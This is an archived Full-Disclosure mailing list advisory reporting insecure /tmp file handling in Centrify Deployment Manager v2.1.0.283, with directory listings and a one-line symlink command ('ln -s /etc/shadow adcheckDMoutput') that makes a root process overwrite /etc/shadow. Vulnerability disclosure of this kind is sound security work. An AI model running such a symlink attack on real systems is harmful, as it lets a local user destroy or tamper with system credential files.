[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Centrify Deployment Manager v2.1.0.283 /tmp insecure file handling



<html><body><div><h2>Centrify Deployment Manager v2.1.0.283</h2><hr>
<p>While at a training session for centrify, I noticed poor 
handling of files in /tmp.  I was able to overwrite /etc/shadow with the
 contents of adcheckDMoutput.
</p><p>I am sure there are more vulnerabilities to be exploit, maybe a 
local root - but being this is a training class I should probably 
focus.....
</p><p>total 6680<br>
-rwxr-xr-x 1 clyde clyde 6790300 Dec  3 14:41 adcheck-rhel3-i386.210
</p><pre>-rw-rw-r-- 1 clyde clyde     188 Dec  3 14:41 centrify.cmd.210
-rwxr-xr-x 1 root  root      187 Dec  3 14:18 engnew-cen.sh
drwx------ 2 root  root     4096 Dec  3 10:25 vmware-root
drwxr-xr-x 7 root  root     4096 Nov 30  2010 vmware-tools-distrib
</pre>
<p>[root@engnew-cen tmp]# ls -l<br>
total 6680<br></p><pre>-rw-rw-rw- 1 root  root     3999 Dec  3 14:41 
adcheckDMoutput
-rwxr-xr-x 1 clyde clyde 6790300 Dec  3 14:41 adcheck-rhel3-i386.210
-rwxr-xr-x 1 root  root      187 Dec  3 14:18 engnew-cen.sh
drwx------ 2 root  root     4096 Dec  3 10:25 vmware-root
drwxr-xr-x 7 root  root     4096 Nov 30  2010 vmware-tools-distrib
</pre>
<p>[root@engnew-cen tmp]# ls -l<br>
total 6688<br></p><pre><b>-rw-rw-rw- 1 root  root     3999 Dec  3 14:41 
adcheckDMoutput </b>
-rwxr-xr-x 1 clyde clyde 6790300 Dec  3 14:41 adcheck-rhel3-i386.210
-rwxr-xr-x 1 clyde clyde     132 Dec  3 14:41 centrify.cmd.210
-rwxr-xr-x 1 root  root      187 Dec  3 14:18 engnew-cen.sh
drwx------ 2 root  root     4096 Dec  3 10:25 vmware-root
drwxr-xr-x 7 root  root     4096 Nov 30  2010 vmware-tools-distrib
</pre>
<p>[root@engnew-cen tmp]# ls -l<br>
total 6672<br>
-rwxr-xr-x 1 clyde clyde 6790300 Dec  3 14:41 adcheck-rhel3-i386.210
-rwxr-xr-x 1 root  root      187 Dec  3 14:18 engnew-cen.sh
</p><p># ln -s /etc/shadow adcheckDMoutput<br>
# ls -l /etc/shadow<br>
-r-------- 1 root root 3999 Dec  3 14:56 /etc/shadow

<br>

I am also assuming the .210 appended to the end of files in /tmp is the  major 
version number. 

</p><p>Larry W. Cashdollar<br>
@_larry0
</p></div></body></html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/